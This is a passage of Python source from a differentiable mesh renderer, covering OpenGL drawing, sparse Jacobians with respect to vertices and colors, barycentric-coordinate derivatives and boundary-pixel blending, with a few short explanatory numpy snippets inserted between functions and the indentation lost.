# gl.EnableClientState(GL_VERTEX_ARRAY)
verts_by_face = np.asarray(v.reshape((-1, 3))[f.ravel()], dtype=np.float64, order='C')
# gl.VertexPointer(verts_by_face)
GL.glBindVertexArray(vao)
self.vbo_verts_dyn.set_array(verts_by_face.astype(np.float32))
self.vbo_verts_dyn.bind()
if fc is not None:
# gl.EnableClientState(GL_COLOR_ARRAY)
if fc.size == verts_by_face.size:
vc_by_face = fc
else:
vc_by_face = np.repeat(fc, f.shape[1], axis=0)
if vc_by_face.size != verts_by_face.size:
raise Exception('fc must have either rows=(#rows in faces) or rows=(# elements in faces)')
vc_by_face = np.asarray(vc_by_face, dtype=np.uint8, order='C')
self.vbo_colors_ub.set_array(vc_by_face)
self.vbo_colors_ub.bind()
primtype = GL.GL_TRIANGLES
self.vbo_indices_dyn.set_array(np.arange(f.size, dtype=np.uint32).ravel())
self.vbo_indices_dyn.bind()
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT2]
GL.glDrawBuffers(1, drawingBuffers)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glDrawElements(primtype, len(self.vbo_indices_dyn), GL.GL_UNSIGNED_INT, None)
GL.glEnable(GL.GL_DEPTH_TEST)
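# The fc expansion rule documented above ("by faces" vs "verts by face")
# can be sketched in isolation; the values here are illustrative only.

```python
import numpy as np

f = np.array([[0, 1, 2], [2, 1, 3]])       # two triangles
fc = np.array([[255, 0, 0], [0, 255, 0]])  # one color per face
# Repeat each face color once per vertex of that face, giving f.size rows,
# one per vertex slot in the flattened index buffer.
vc_by_face = np.repeat(fc, f.shape[1], axis=0)
```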
def compute_dr_wrt(self, wrt):
visibility = self.visibility_image
if wrt is self.camera:
derivatives_verts = self.get_derivatives_verts()
return derivatives_verts
elif wrt is self.vc:
derivatives_vc = self.get_derivatives_vc()
return derivatives_vc
# Not working atm.:
elif wrt is self.bgcolor:
return 2. * (self.imageGT.r - self.render_image).ravel() * common.dr_wrt_bgcolor(visibility, self.frustum, num_channels=self.num_channels)
# Not working atm.:
elif wrt is self.texture_stack:
IS = np.nonzero(self.visibility_image.ravel() != 4294967295)[0]
texcoords, texidx = self.texcoord_image_quantized
vis_texidx = texidx.ravel()[IS]
vis_texcoords = texcoords.ravel()[IS]
JS = vis_texcoords * np.tile(col(vis_texidx), [1, 2]).ravel()
clr_im = -2. * (self.imageGT.r - self.render_image) * self.renderWithoutTexture
if False:
cv2.imshow('clr_im', clr_im)
# cv2.imshow('texmap', self.texture_image.r)
cv2.waitKey(1)
r = clr_im[:, :, 0].ravel()[IS]
g = clr_im[:, :, 1].ravel()[IS]
b = clr_im[:, :, 2].ravel()[IS]
data = np.concatenate((r, g, b))
IS = np.concatenate((IS * 3, IS * 3 + 1, IS * 3 + 2))
JS = np.concatenate((JS * 3, JS * 3 + 1, JS * 3 + 2))
return sp.csc_matrix((data, (IS, JS)), shape=(self.r.size, wrt.r.size))
return None
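# A hedged sketch of the sparse-Jacobian assembly pattern used in
# compute_dr_wrt: per-pixel partial derivatives (data) are scattered into a
# (num_outputs x num_params) matrix via row indices IS and column indices
# JS; scipy sums values at duplicate (row, col) pairs. Shapes here are toy
# values, not the renderer's.

```python
import numpy as np
import scipy.sparse as sp

data = np.array([1.0, 2.0, 3.0, 4.0])
IS = np.array([0, 0, 1, 2])  # flattened output (pixel-channel) indices
JS = np.array([0, 1, 1, 2])  # flattened parameter indices
J = sp.csc_matrix((data, (IS, JS)), shape=(4, 3))
```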
def compute_r(self):
return self.render()
@depends_on(dterms + terms)
def renderWithoutColor(self):
self._call_on_changed()
return self.render_nocolor
@depends_on(dterms + terms)
def renderWithoutTexture(self):
self._call_on_changed()
return self.render_notexture
# @depends_on(dterms+terms)
def render(self):
self._call_on_changed()
visibility = self.visibility_image
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
if self.updateRender:
render, residuals = self.compute_image(visible, visibility, self.f)
self.render_result = render
self.residuals_result = residuals
self.updateRender = False
if self.imageGT is None:
returnResult = self.render_result
else:
returnResult = self.residuals_result
return returnResult
def get_derivatives_verts(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_verts:
if self.updateRender:
self.render()
if self.overdraw:
# return common.dImage_wrt_2dVerts_bnd(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f, self.boundaryid_image != 4294967295)
derivatives_verts = common.dImage_wrt_2dVerts_bnd(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f, self.boundaryid_image != 4294967295)
else:
derivatives_verts = common.dImage_wrt_2dVerts(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f)
self.derivatives_verts = derivatives_verts
self.updateDerivatives_verts = False
return self.derivatives_verts
def get_derivatives_vc(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_vc:
if self.updateRender:
self.render()
derivatives_vc = self.compute_derivatives_vc(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'],
self.v.r.size / 3, self.f)
self.derivatives_vc = derivatives_vc
self.updateDerivatives_vc = False
return self.derivatives_vc
# # @depends_on(dterms+terms)
# def image_and_derivatives(self):
# # self._call_on_changed()
# visibility = self.visibility_image
#
# color = self.render_resolved
#
# visible = np.nonzero(visibility.ravel() != 4294967295)[0]
# num_visible = len(visible)
#
# barycentric = self.barycentric_image
#
# if self.updateRender:
# render, derivatives = self.compute_image_and_derivatives(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size / 3, self.f)
# self.render = render
# self.derivatives = derivatives
# self.updateRender = False
#
# return self.render, self.derivatives
#
def barycentricDerivatives(self, vertices, faces, verts):
import chumpy as ch
vertices = np.concatenate([vertices, np.ones([vertices.size // 3, 1])], axis=1)
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# # # Check with autodiff:
# #
# view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
# # negYMat = ch.array([[1,0,self.camera.c.r[0]],[0,-1,self.camera.c.r[1]],[0,0,1]])
# verts_hom_ch = ch.Ch(verts_hom)
# camMtx = ch.Ch(np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])])
# projVerts = (camMtx.dot(view_mtx)).dot(verts_hom_ch.T).T[:, :3].reshape([-1, 3])
# viewVerts = ch.Ch(np.array(projVerts))
# projVerts = projVerts[:, :2] / projVerts[:, 2:3]
#
# chViewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# p0 = ch.Ch(viewVerticesNonBnd[:, 0, :])
# chp0 = p0
#
# p1 = ch.Ch(viewVerticesNonBnd[:, 1, :])
# chp1 = p1
#
# p2 = ch.Ch(viewVerticesNonBnd[:, 2, :])
# chp2 = p2
#
# # D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
# nt = ch.cross(p1 - p0, p2 - p0)
# chnt = nt
# A = 0.5 * ch.sqrt(ch.sum(nt ** 2, axis=1))
# chnt_norm = nt / ch.sqrt(ch.sum(nt ** 2, axis=1))[:, None]
# # nt = nt / A
#
# chb0part2 = ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1)
# chb0 = 0.5 * ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1) / A
# chb1part2 = ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1)
# chb1 = 0.5 * ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1) / A
# chb2part2 = ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1)
# chb2 = 0.5 * ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1) / A
#
# drb0p0 = chb0.dr_wrt(p0)
# drb0p1 = chb0.dr_wrt(p1)
# drb0p2 = chb0.dr_wrt(p2)
#
# drb1p0 = chb1.dr_wrt(p0)
# drb1p1 = chb1.dr_wrt(p1)
# drb1p2 = chb1.dr_wrt(p2)
#
# drb2p0 = chb2.dr_wrt(p0)
# drb2p1 = chb2.dr_wrt(p1)
# drb2p2 = chb2.dr_wrt(p2)
#
# rows = np.tile(np.arange(drb0p0.shape[0])[None, :], [3, 1]).T.ravel()
# cols = np.arange(drb0p0.shape[0] * 3)
#
# drb0p0 = np.array(drb0p0[rows, cols]).reshape([-1, 3])
# drb0p1 = np.array(drb0p1[rows, cols]).reshape([-1, 3])
# drb0p2 = np.array(drb0p2[rows, cols]).reshape([-1, 3])
# drb1p0 = np.array(drb1p0[rows, cols]).reshape([-1, 3])
# drb1p1 = np.array(drb1p1[rows, cols]).reshape([-1, 3])
# drb1p2 = np.array(drb1p2[rows, cols]).reshape([-1, 3])
# drb2p0 = np.array(drb2p0[rows, cols]).reshape([-1, 3])
# drb2p1 = np.array(drb2p1[rows, cols]).reshape([-1, 3])
# drb2p2 = np.array(drb2p2[rows, cols]).reshape([-1, 3])
#
# chdp0 = np.concatenate([drb0p0[:, None, :], drb1p0[:, None, :], drb2p0[:, None, :]], axis=1)
# chdp1 = np.concatenate([drb0p1[:, None, :], drb1p1[:, None, :], drb2p1[:, None, :]], axis=1)
# chdp2 = np.concatenate([drb0p2[:, None, :], drb1p2[:, None, :], drb2p2[:, None, :]], axis=1)
#
# dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
# dp = dp[None, :]
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerts = projVerts
projVerts = projVerts[:, :2] / projVerts[:, 2:3]
# viewVerticesNonBnd = negYMat.dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
p0 = viewVerticesNonBnd[:, 0, :]
p1 = viewVerticesNonBnd[:, 1, :]
p2 = viewVerticesNonBnd[:, 2, :]
p0_proj = p0[:, 0:2] / p0[:, 2:3]
p1_proj = p1[:, 0:2] / p1[:, 2:3]
p2_proj = p2[:, 0:2] / p2[:, 2:3]
# D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
nt = np.cross(p1 - p0, p2 - p0)
nt_norm = nt / np.linalg.norm(nt, axis=1)[:, None]
# a = -nt_norm[:, 0] / nt_norm[:, 2]
# b = -nt_norm[:, 1] / nt_norm[:, 2]
# c = np.sum(nt_norm * p0, 1) / nt_norm[:, 2]
cam_f = 1
u = p0[:, 0] / p0[:, 2]
v = p0[:, 1] / p0[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p0[:, 2][:, None], np.zeros([len(p0), 1]), (-p0[:, 0] / u ** 2)[:, None]]
xv = np.c_[np.zeros([len(p0), 1]), p0[:, 2][:, None], (-p0[:, 1] / v ** 2)[:, None]]
dxdp_0 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p1[:, 0] / p1[:, 2]
v = p1[:, 1] / p1[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p1[:, 2][:, None], np.zeros([len(p1), 1]), (-p1[:, 0] / u ** 2)[:, None]]
xv = np.c_[np.zeros([len(p1), 1]), p1[:, 2][:, None], (-p1[:, 1] / v ** 2)[:, None]]
dxdp_1 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p2[:, 0] / p2[:, 2]
v = p2[:, 1] / p2[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p2[:, 2][:, None], np.zeros([len(p2), 1]), (-p2[:, 0] / u ** 2)[:, None]]
xv = np.c_[np.zeros([len(p2), 1]), p2[:, 2][:, None], (-p2[:, 1] / v ** 2)[:, None]]
dxdp_2 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
# x = u * c / (cam_f - a * u - b * v)
# y = v*c/(cam_f - a*u - b*v)
# z = c*cam_f/(cam_f - a*u - b*v)
A = 0.5 * np.linalg.norm(nt, axis=1)
nt_mag = 2. * A
# nt = nt / A
# db1 = 0.5*np.cross(nt_norm, p2-p1)/A[:, None]
# db2 = 0.5*np.cross(nt_norm, p0-p2)/A[:, None]
# db3_2 = 0.5*np.cross(nt_norm, p1-p0)/A[:, None]
# db3 = - db1 - db2
p = viewVerts
pre1 = -1 / (nt_mag[:, None] ** 2) * nt_norm
ident = np.identity(3)
ident = np.tile(ident[None, :], [len(p2), 1, 1])
dntdp0 = np.cross((p2 - p0)[:, None, :], -ident) + np.cross(-ident, (p1 - p0)[:, None, :])
dntdp1 = np.cross((p2 - p0)[:, None, :], ident)
dntdp2 = np.cross(ident, (p1 - p0)[:, None, :])
# Jacobian of vector normalization: d(n/|n|)/dn = (I - n_hat n_hat^T) / |n|
dntnorm = (ident - np.einsum('ij,ik->ijk', nt_norm, nt_norm)) / nt_mag[:, None, None]
dntnormdp0 = np.einsum('ijk,ikl->ijl', dntnorm, dntdp0)
dntnormdp1 = np.einsum('ijk,ikl->ijl', dntnorm, dntdp1)
dntnormdp2 = np.einsum('ijk,ikl->ijl', dntnorm, dntdp2)
dpart1p0 = np.einsum('ij,ijk->ik', pre1, dntdp0)
dpart1p1 = np.einsum('ij,ijk->ik', pre1, dntdp1)
dpart1p2 = np.einsum('ij,ijk->ik', pre1, dntdp2)
b0 = np.sum(np.cross(nt_norm, p2 - p1) * (p - p1), axis=1)[:, None]
db0part2p0 = np.einsum('ikj,ij->ik', np.cross(dntnormdp0.swapaxes(1, 2), (p2 - p1)[:, None, :]), p - p1)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident,nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2-p1),-ident)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0.swapaxes(1,2)), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident, nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(p2-p1,nt_norm[:, :]),-ident)
db0part2p1 = np.einsum('ikj,ij->ik', np.cross(dntnormdp1.swapaxes(1, 2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], -ident), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2 - p1), -ident)
db0part2p2 = np.einsum('ikj,ij->ik', np.cross(dntnormdp2.swapaxes(1, 2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], ident), p - p1)
db0dp0wrtpart1 = dpart1p0 * b0
db0dp1wrtpart1 = dpart1p1 * b0
db0dp2wrtpart1 = dpart1p2 * b0
db0dp0wrtpart2 = 1. / (nt_mag[:, None]) * db0part2p0
db0dp1wrtpart2 = 1. / (nt_mag[:, None]) * db0part2p1
db0dp2wrtpart2 = 1. / (nt_mag[:, None]) * db0part2p2
db0dp0wrt = db0dp0wrtpart1 + db0dp0wrtpart2
db0dp1wrt = db0dp1wrtpart1 + db0dp1wrtpart2
db0dp2wrt = db0dp2wrtpart1 + db0dp2wrtpart2
######
b1 = np.sum(np.cross(nt_norm, p0 - p2) * (p - p2), axis=1)[:, None]
db1part2p0 = np.einsum('ikj,ij->ik', np.cross(dntnormdp0.swapaxes(1, 2), (p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], ident), p - p2)
db1part2p1 = np.einsum('ikj,ij->ik', np.cross(dntnormdp1.swapaxes(1, 2), (p0 - p2)[:, None, :]), p - p2)
db1part2p2 = np.einsum('ikj,ij->ik', np.cross(dntnormdp2.swapaxes(1, 2), (p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], -ident), p - p2) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p0 - p2), -ident)
db1dp0wrtpart1 = dpart1p0 * b1
db1dp1wrtpart1 = dpart1p1 * b1
db1dp2wrtpart1 = dpart1p2 * b1
db1dp0wrtpart2 = 1. / (nt_mag[:, None]) * db1part2p0
db1dp1wrtpart2 = 1. / (nt_mag[:, None]) * db1part2p1
db1dp2wrtpart2 = 1. / (nt_mag[:, None]) * db1part2p2
db1dp0wrt = db1dp0wrtpart1 + db1dp0wrtpart2
db1dp1wrt = db1dp1wrtpart1 + db1dp1wrtpart2
db1dp2wrt = db1dp2wrtpart1 + db1dp2wrtpart2
######
b2 = np.sum(np.cross(nt_norm, p1 - p0) * (p - p0), axis=1)[:, None]
db2part2p0 = np.einsum('ikj,ij->ik', np.cross(dntnormdp0.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], -ident), p - p0) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p1 - p0), -ident)
db2part2p1 = np.einsum('ikj,ij->ik', np.cross(dntnormdp1.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(
nt_norm[:, None, :], ident), p - p0)
db2part2p2 = np.einsum('ikj,ij->ik', np.cross(dntnormdp2.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0)
db2dp0wrtpart1 = dpart1p0 * b2
db2dp1wrtpart1 = dpart1p1 * b2
db2dp2wrtpart1 = dpart1p2 * b2
db2dp0wrtpart2 = 1. / (nt_mag[:, None]) * db2part2p0
db2dp1wrtpart2 = 1. / (nt_mag[:, None]) * db2part2p1
db2dp2wrtpart2 = 1. / (nt_mag[:, None]) * db2part2p2
db2dp0wrt = db2dp0wrtpart1 + db2dp0wrtpart2
db2dp1wrt = db2dp1wrtpart1 + db2dp1wrtpart2
db2dp2wrt = db2dp2wrtpart1 + db2dp2wrtpart2
dp0 = np.concatenate([db0dp0wrt[:, None, :], db1dp0wrt[:, None, :], db2dp0wrt[:, None, :]], axis=1)
dp1 = np.concatenate([db0dp1wrt[:, None, :], db1dp1wrt[:, None, :], db2dp1wrt[:, None, :]], axis=1)
dp2 = np.concatenate([db0dp2wrt[:, None, :], db1dp2wrt[:, None, :], db2dp2wrt[:, None, :]], axis=1)
#
dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
# If dealing with degenerate triangles, ignore that gradient.
# dp[nt_mag <= 1e-15] = 0
dp = dp[None, :]
nFaces = len(faces)
# visTriVC = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
vc = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
visTriVC = np.clip(vc, 0., 1.)
dxdp = np.concatenate([dxdp_0[:, None, :], dxdp_1[:, None, :], dxdp_2[:, None, :]], axis=1)
dxdp = dxdp[None, :, None]
# dbvc = np.sum(dp * visTriVC, 2)
# dbvc = dp * visTriVC * t_area[None, :, None, None, None]
dbvc = dp * visTriVC
didp = np.sum(dbvc[:, :, :, :, :, None] * dxdp, 4).sum(2)
# output should be shape: VC x Ninput x Tri Points x UV
# drb0p0 # db0dp0wrt
# drb0p1 # db0dp1wrt
# drb0p2 # db0dp2wrt
# drb1p0 # db1dp0wrt
# drb1p1 # db1dp1wrt
# drb1p2 # db1dp2wrt
# drb2p0 # db2dp0wrt
# drb2p1 # db2dp1wrt
# drb2p2 # db2dp2wrt
return didp
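# The barycentric formulas differentiated above can be checked numerically:
# with A the triangle area and n_hat its unit normal,
# b0 = 0.5 * dot(cross(n_hat, p2 - p1), p - p1) / A (and cyclically for b1,
# b2); for a point in the triangle's plane these sum to 1. A toy check:

```python
import numpy as np

p0 = np.array([0.0, 0.0, 1.0])
p1 = np.array([1.0, 0.0, 1.0])
p2 = np.array([0.0, 1.0, 1.0])
p = 0.2 * p0 + 0.3 * p1 + 0.5 * p2  # known barycentrics (0.2, 0.3, 0.5)

nt = np.cross(p1 - p0, p2 - p0)
n_hat = nt / np.linalg.norm(nt)
A = 0.5 * np.linalg.norm(nt)

b0 = 0.5 * np.dot(np.cross(n_hat, p2 - p1), p - p1) / A
b1 = 0.5 * np.dot(np.cross(n_hat, p0 - p2), p - p2) / A
b2 = 0.5 * np.dot(np.cross(n_hat, p1 - p0), p - p0) / A
```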
def compute_image(self, visible, visibility, f):
"""Resolve the multisample renders into the final image and, when a
ground-truth image is available, the per-pixel squared residuals.
Boundary pixels are blended from the per-sample colors, weighted by each
sample's distance to the occluding edge."""
boundaryImage = self.boundarybool_image.astype(bool) & (visibility != 4294967295)
zerosIm = np.ones(self.boundarybool_image.shape, dtype=bool)
edge_visibility = self.boundaryid_image
nsamples = self.nsamples
if np.any(boundaryImage):
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape(
[nsamples, -1, 2])
# sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:,(zerosIm*boundaryImage).ravel().astype(bool),:].reshape([nsamples, -1, 3])
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 3])
boundaryFaces = visibility[(boundaryImage) & (visibility != 4294967295)]
nBndFaces = len(boundaryFaces)
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()].reshape([-1, 2, 2])
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1, 1, 1])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(bool)].reshape([nsamples, -1]) - 1
# if self.debug:
# import pdb; pdb.set_trace()
# faces = f[sampleFaces].ravel()
# vertsPerFaceProjBnd = self.camera.r[faces].reshape([-1, 3, 2])
# nv = len(vertsPerFaceProjBnd)
# p0_proj = np.c_[vertsPerFaceProjBnd[:, 0, :], np.ones([nv, 1])]
# p1_proj = np.c_[vertsPerFaceProjBnd[:, 1, :], np.ones([nv, 1])]
# p2_proj = np.c_[vertsPerFaceProjBnd[:, 2, :], np.ones([nv, 1])]
# t_area_bnd = np.abs(np.linalg.det(np.concatenate([p0_proj[:, None], p1_proj[:, None], p2_proj[:, None]], axis=1)) * 0.5)
# t_area_bnd[t_area_bnd > 1] = 1
# Trick to cap to 1 while keeping gradients.
p1 = vertsProjBndSamples.reshape([-1,2,2])[:, 0, :]
p2 = vertsProjBndSamples.reshape([-1,2,2])[:, 1, :]
p = sampleV.reshape([-1,2])
l = (p2 - p1)
linedist = np.sqrt((np.sum(l ** 2, axis=1)))[:, None]
self.linedist = linedist
lnorm = l / linedist
self.lnorm = lnorm
v1 = p - p1
self.v1 = v1
d = v1[:, 0] * lnorm[:, 0] + v1[:, 1] * lnorm[:, 1]
self.d = d
intersectPoint = p1 + d[:, None] * lnorm
v2 = p - p2
self.v2 = v2
l12 = (p1 - p2)
linedist12 = np.sqrt((np.sum(l12 ** 2, axis=1)))[:, None]
lnorm12 = l12 / linedist12
d2 = v2[:, 0] * lnorm12[:, 0] + v2[:, 1] * lnorm12[:, 1]
nonIntersect = (d2 < 0) | (d < 0)
self.nonIntersect = nonIntersect
argminDistNonIntersect = np.argmin(np.c_[d[nonIntersect], d2[nonIntersect]], 1)
self.argminDistNonIntersect = argminDistNonIntersect
intersectPoint[nonIntersect] = vertsProjBndSamples.reshape([-1,2,2])[nonIntersect][np.arange(nonIntersect.sum()), argminDistNonIntersect]
lineToPoint = (p - intersectPoint)
n = lineToPoint
dist = np.sqrt((np.sum(lineToPoint ** 2, axis=1)))[:, None]
n_norm = lineToPoint / dist
self.n_norm = n_norm
self.dist = dist
d_final = dist.squeeze()
# max_nx_ny = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
# d_final = d_final / max_nx_ny
# invViewMtx = np.linalg.inv(np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])])
# #
# camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
# # invCamMtx = np.r_[np.c_[np.linalg.inv(self.camera.camera_mtx), np.array([0,0,0])], np.array([[0, 0, 0, 1]])]
#
# view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
# verticesBndSamples = np.concatenate([verticesBndSamples.reshape([-1, 3]), np.ones([verticesBndSamples.size // 3, 1])], axis=1)
# projVerticesBndOutside = (camMtx.dot(view_mtx)).dot(verticesBndSamples.T).T[:, :3].reshape([-1, 2, 3])
# projVerticesBndDir = projVerticesBndOutside[:, 1, :] - projVerticesBndOutside[:, 0, :]
# projVerticesBndDir = projVerticesBndDir / np.sqrt((np.sum(projVerticesBndDir ** 2, 1)))[:, None]
# dproj = (intersectPoint[:, 0] * projVerticesBndOutside[:, 0, 2] - projVerticesBndOutside[:, 0, 0]) / (projVerticesBndDir[:, 0] - projVerticesBndDir[:, 2] * intersectPoint[:, 0])
# # Code to check computation that dproj == dprojy
# # dproj_y = (intersectPoint[:,1]* projVerticesBndOutside[:,0,2] - projVerticesBndOutside[:,0,1]) / (projVerticesBndDir[:,1] - projVerticesBndDir[:,2]*intersectPoint[:,1])
#
# projPoint = projVerticesBndOutside[:, 0, :][:, :] + dproj[:, None] * projVerticesBndDir[:, :]
#
# projPointVec4 = np.concatenate([projPoint, np.ones([projPoint.shape[0], 1])], axis=1)
# viewPointIntersect = (invViewMtx.dot(np.linalg.inv(camMtx)).dot(projPointVec4.T.reshape([4, -1])).reshape([4, -1])).T[:, :3]
#
# barycentricVertsDistIntesect = np.linalg.norm(viewPointIntersect - verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 0, :], axis=1)
# barycentricVertsDistIntesect2 = np.linalg.norm(viewPointIntersect - verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 1, :], axis=1)
# # Code to check barycentricVertsDistIntesect + barycentricVertsDistIntesect2 = barycentricVertsDistEdge
# barycentricVertsDistEdge = np.linalg.norm(
# verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 0, :] - verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 1, :], axis=1)
#
# nonIntersect = np.abs(barycentricVertsDistIntesect + barycentricVertsDistIntesect2 - barycentricVertsDistEdge) > 1e-4
# argminDistNonIntersect = np.argmin(np.c_[barycentricVertsDistIntesect[nonIntersect], barycentricVertsDistIntesect2[nonIntersect]], 1)
#
# self.viewPointIntersect = viewPointIntersect
# self.viewPointIntersect[nonIntersect] = verticesBndSamples.reshape([-1, 2, 4])[nonIntersect, :, 0:3][np.arange(nonIntersect.sum()),
# argminDistNonIntersect, :]
d_finalNP = d_final.copy()
self.d_final = d_finalNP
# self.t_area_bnd = t_area_bnd
# areaWeights = np.zeros([nsamples, nBndFaces])
# areaWeights = t_area_bnd.reshape([nsamples, nBndFaces])
# areaWeightsTotal = areaWeights.sum(0)
## areaWeightsTotal[areaWeightsTotal < 1] = 1
# self.areaWeights = areaWeights
# self.areaWeightsTotal = areaWeightsTotal
finalColorBnd = np.ones([self.nsamples, boundaryFaces.size, 3])
self.d_final_total = d_finalNP.reshape([self.nsamples, -1,1]).sum(0)
# if self.imageGT is not None:
